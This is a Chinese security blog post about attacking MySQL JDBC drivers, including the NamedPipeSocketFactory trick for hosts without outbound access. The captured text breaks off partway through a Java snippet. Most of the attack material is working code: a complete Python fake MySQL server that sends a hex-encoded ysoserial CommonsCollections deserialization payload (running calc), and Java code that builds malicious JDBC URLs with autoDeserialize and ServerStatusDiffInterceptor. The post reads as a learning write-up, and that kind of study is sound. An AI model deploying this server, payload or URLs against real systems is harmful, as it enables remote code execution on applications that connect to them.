<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Web, Security, Web安全, Java, Java安全">
    <meta name="description" content="记录一下我的网安学习">
    <meta name="author" content="1diot9">
    
    <title>
        
            MySQL JDBC Attack常规打法及绕过 |
        
        1diot9&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/baka.png">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#CCCCCC","title":"1diot9's Blog","author":"1diot9","avatar":"/images/baka.png","logo":"/images/baka.png","favicon":"/images/baka.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"登上山顶的人沉默不语，半途而废者诉说着旅途的艰辛","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://www.github.com/1diot9","weixin":"img | /images/weixin.jpg","qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":true,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"updated","post_datetime_format":"YYYY-MM-DD HH:mm:ss"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null},"img_align":"center"},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":true},"footer":{"since":2025,"word_count":true,"site_deploy":{"enable":true,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/baka.png">
                </a>
            
            <a class="site-name border-box" href="/">
               1diot9&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/about">
                                
                                关于
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/about">
                            
                            关于
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        MySQL JDBC Attack常规打法及绕过
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/baka.png">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">1diot9</span>
                                
                                    <span class="author-badge">Lv4</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-05-05 19:58:39</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Wed Oct 22 2025 18:29:41 GMT+0800">2025-10-22 18:29:41</span>
                </span>
            
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>3.2k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>14 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h1 id="不出网打法"><a href="#不出网打法" class="headerlink" title="不出网打法"></a>不出网打法</h1><p><a class="link"   target="_blank" rel="noopener" href="https://xz.aliyun.com/news/17830" >https://xz.aliyun.com/news/17830<i class="fas fa-external-link-alt"></i></a></p>
<p>由m4x师傅最先发现，原理文章中已经详细介绍，这里简单概括一下。</p>
<h2 id="原理概述"><a href="#原理概述" class="headerlink" title="原理概述"></a>原理概述</h2><p>概况：在连接参数中指定socketFactory为NamedPipeSocketFactory。此工厂会打开一个文件，并且最终使用这个文件流作为与服务器连接的IO通道，最终实现本地化的mysql通讯，就跟我们打远程jdbc一样。</p>
<p>这里以5.1.47 的驱动为例。</p>
<p>MysqlIO是一个重要的初始化类：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761126633265-204f33f2-0944-40da-b734-fda3324b511c.png"  alt="img"></p>
<p>重点关注socketFactoryClassName。赋值后，执行了createSocketFactory方法：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761127518816-4487ba5d-b83c-485f-9504-a4cf24b8cceb.png"  alt="img"></p>
<p>这个方法会初始化上面的socketFactoryClassName，并且socketFactoryClassName必须是SocketFactory的实现。</p>
<p>看一下这个接口有哪些实现:</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761127592566-c4076a26-b416-48cb-87d6-2e7f3a9afe14.png"  alt="img"></p>
<p>StandardSocketFactory是socketFactoryClassName的默认值，因为：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761127858348-f3bf1c05-5cbe-4efc-8464-730142be5b7b.png"  alt="img"></p>
<p>而我们这里关注NamedPipeSocketFactory。</p>
<p>回头看一下，createSocketFactory()后，会调用对应工厂的connect()：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761127974907-a0bee1ed-78c1-40e3-bc48-89f54e1c0790.png"  alt="img"></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761127993585-bd22e458-8dd1-4b44-9b03-39344b17590d.png"  alt="img"></p>
<p>可以看到，namedPipePath是从props里获取的。跟进看一下NamePipeSocket的构造方法：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761128047939-61b8c8ec-56a0-46cd-8031-7d6f018f4e45.png"  alt="img"></p>
<p>这里打开了一个文件，并且最终使用这个文件流作为与服务器连接的IO通道。</p>
<p>回头看一下props是否可控，发现可以的，就是jdbc url里的连接参数。</p>
<h2 id="pcap正常生成"><a href="#pcap正常生成" class="headerlink" title="pcap正常生成"></a>pcap正常生成</h2><p>主要讲一下我在pcap生成时遇到的问题。</p>
<p>先给出正确的生成流程。</p>
<p>开启fakeServer：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">greeting_data=<span class="string">&quot;4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400&quot;</span></span><br><span class="line">response_ok_data=<span class="string">&quot;0700000200000002000000&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">receive_data</span>(<span class="params">conn</span>):</span><br><span class="line">    data = conn.recv(<span class="number">1024</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[*] Receiveing the package : &#123;&#125;&quot;</span>.<span class="built_in">format</span>(data))</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">str</span>(data).lower()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send_data</span>(<span class="params">conn,data</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[*] Sending the package : &#123;&#125;&quot;</span>.<span class="built_in">format</span>(data))</span><br><span class="line">    conn.send(binascii.a2b_hex(data))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_payload_content</span>():</span><br><span class="line">    <span class="comment">#file文件的内容使用ysoserial生成的 使用规则：java -jar ysoserial [Gadget] [command] &gt; payload</span></span><br><span class="line">    file= <span class="string">r&#x27;D:\1tmp\cc5.bin&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> os.path.isfile(file):</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(file, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            payload_content = <span class="built_in">str</span>(binascii.b2a_hex(f.read()),encoding=<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;open successs&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;open false&quot;</span>)</span><br><span class="line">        <span class="comment">#calc</span></span><br><span class="line">        payload_content=<span class="string">&#x27;aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878&#x27;</span></span><br><span class="line">    <span class="keyword">return</span> payload_content</span><br><span class="line"></span><br><span class="line"><span class="comment"># 主要逻辑</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run</span>():</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">        conn, addr = sk.accept()</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Connection come from &#123;&#125;:&#123;&#125;&quot;</span>.<span class="built_in">format</span>(addr[<span class="number">0</span>],addr[<span class="number">1</span>]))</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 1.先发送第一个 问候报文</span></span><br><span class="line">        send_data(conn,greeting_data)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            <span class="comment"># 登录认证过程模拟  1.客户端发送request login报文 2.服务端响应response_ok</span></span><br><span class="line">            receive_data(conn)</span><br><span class="line">            send_data(conn,response_ok_data)</span><br><span class="line"></span><br><span class="line">            <span class="comment">#其他过程</span></span><br><span class="line">            data=receive_data(conn)</span><br><span class="line">            <span class="comment">#查询一些配置信息,其中会发送自己的 版本号</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;session.auto_increment_increment&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">                _payload=<span class="string">&#x27;01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000&#x27;</span></span><br><span class="line">                send_data(conn,_payload)</span><br><span class="line">                data=receive_data(conn)</span><br><span class="line">            <span class="keyword">elif</span> <span class="string">&quot;show warnings&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">                _payload = <span class="string">&#x27;01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000&#x27;</span></span><br><span class="line">                send_data(conn, _payload)</span><br><span class="line">                data = receive_data(conn)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;set names&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">                send_data(conn, response_ok_data)</span><br><span class="line">                data = receive_data(conn)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;set character_set_results&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">                send_data(conn, response_ok_data)</span><br><span class="line">                data = receive_data(conn)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;show session status&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">                mysql_data = <span class="string">&#x27;0100000102&#x27;</span></span><br><span class="line">                mysql_data += <span class="string">&#x27;1a000002036465660001630163016301630c3f00ffff0000fc9000000000&#x27;</span></span><br><span class="line">                mysql_data += <span class="string">&#x27;1a000003036465660001630163016301630c3f00ffff0000fc9000000000&#x27;</span></span><br><span class="line">                <span class="comment"># 为什么我加了EOF Packet 就无法正常运行呢？？</span></span><br><span class="line">                <span class="comment"># 获取payload</span></span><br><span class="line">                payload_content=get_payload_content()</span><br><span class="line">                <span class="comment"># 计算payload长度</span></span><br><span class="line">                payload_length = <span class="built_in">str</span>(<span class="built_in">hex</span>(<span class="built_in">len</span>(payload_content)//<span class="number">2</span>)).replace(<span class="string">&#x27;0x&#x27;</span>, <span class="string">&#x27;&#x27;</span>).zfill(<span class="number">4</span>)</span><br><span class="line">                payload_length_hex = payload_length[<span class="number">2</span>:<span class="number">4</span>] + payload_length[<span class="number">0</span>:<span class="number">2</span>]</span><br><span class="line">                <span class="comment"># 计算数据包长度</span></span><br><span class="line">                data_len = <span class="built_in">str</span>(<span class="built_in">hex</span>(<span class="built_in">len</span>(payload_content)//<span class="number">2</span> + <span class="number">4</span>)).replace(<span class="string">&#x27;0x&#x27;</span>, <span class="string">&#x27;&#x27;</span>).zfill(<span class="number">6</span>)</span><br><span class="line">                data_len_hex = data_len[<span class="number">4</span>:<span class="number">6</span>] + data_len[<span class="number">2</span>:<span class="number">4</span>] + data_len[<span class="number">0</span>:<span class="number">2</span>]</span><br><span class="line">                mysql_data += data_len_hex + <span class="string">&#x27;04&#x27;</span> + <span class="string">&#x27;fbfc&#x27;</span>+ payload_length_hex</span><br><span class="line">                mysql_data += <span class="built_in">str</span>(payload_content)</span><br><span class="line">                mysql_data += <span class="string">&#x27;07000005fe000022000100&#x27;</span></span><br><span class="line">                send_data(conn, mysql_data)</span><br><span class="line">                data = receive_data(conn)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;show warnings&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">                payload = <span class="string">&#x27;01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000&#x27;</span></span><br><span class="line">                send_data(conn, payload)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    HOST =<span class="string">&#x27;127.0.0.1&#x27;</span></span><br><span class="line">    PORT = <span class="number">3307</span></span><br><span class="line"></span><br><span class="line">    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    <span class="comment">#当socket关闭后，本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间</span></span><br><span class="line">    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</span><br><span class="line">    sk.bind((HOST, PORT))</span><br><span class="line">    sk.listen(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;start fake mysql server listening on &#123;&#125;:&#123;&#125;&quot;</span>.<span class="built_in">format</span>(HOST,PORT))</span><br><span class="line"></span><br><span class="line">    run()</span><br></pre></td></tr></table></figure>

<p>打开wireshrak，选择Adapter for loopback traffic capture。</p>
<p>编写规则筛选mysql流量。由于我这里开在3307端口，所以需要写成ip.src &#x3D;&#x3D; 127.0.0.1 and tcp.dstport &#x3D;&#x3D; 3307。如果正常在3306端口，则直接输入mysql筛选即可。<img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1760232127035-23b8f993-ba4b-4a10-a47c-2ada1c239ea6.png"  alt="img"></p>
<p>接着正常进行mysql jdbc 出网攻击。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> exp;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.sql.Connection;</span><br><span class="line"><span class="keyword">import</span> java.sql.DriverManager;</span><br><span class="line"><span class="keyword">import</span> java.sql.SQLException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Exp</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> SQLException &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">url</span> <span class="operator">=</span> <span class="string">&quot;jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=root&amp;password=root&quot;</span>;</span><br><span class="line">        <span class="type">String</span> <span class="variable">noOutBound</span> <span class="operator">=</span> <span class="string">&quot;jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=root&amp;password=root&amp;socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&amp;namedPipePath=YsoserialGadgetGenerate.bin&quot;</span>;</span><br><span class="line">        <span class="type">String</span> <span class="variable">username</span> <span class="operator">=</span> <span class="string">&quot;root&quot;</span>;</span><br><span class="line">        <span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">&quot;root&quot;</span>;</span><br><span class="line">        <span class="keyword">try</span> (<span class="type">Connection</span> <span class="variable">connection</span> <span class="operator">=</span> DriverManager.getConnection(url, username, password)) &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;数据库连接成功!&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (SQLException e) &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;数据库连接失败!&quot;</span>);</span><br><span class="line">            